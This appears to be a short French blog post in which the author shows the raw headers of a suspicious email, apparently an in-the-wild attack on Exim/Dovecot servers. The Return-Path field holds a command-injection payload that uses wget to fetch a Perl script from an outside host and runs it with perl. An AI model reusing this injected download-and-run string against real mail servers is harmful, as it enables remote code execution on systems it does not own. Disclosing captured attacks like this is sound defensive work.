exploit exim/dovecot
En regardant mes mails ce matin, je suis tombé sur un email bizarre: pas d’expéditeur, pas de sujet, pas de date, et juste un «x» dans le corps du message. Du coup, j’ai regardé ce qu’il y avait vraiment dedans:
Return-Path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}radioactivefrog.com/.x/exim.txt``perl${IFS}/tmp/p.pl`@blaat.com> Delivered-To: XXXX@YYYY.ZZZZ Received: by XXXX (Postfix) id DFDE128000; Wed, 19 Jun 2013 00:22:35 +0200 (CEST) Delivered-To: postmaster@localhost Received: from localhost (localhost.localdomain [127.0.0.1]) by XXXX (Postfix) with ESMTP id 88FEE2800E for <postmaster@localhost>; Wed, 19 Jun 2013 00:22:30 +0200 (CEST) X-Virus-Scanned: Debian amavisd-new at XXXX X-Amavis-Alert: BAD HEADER SECTION, Missing required header field: "Date" Received: from XXXX ([127.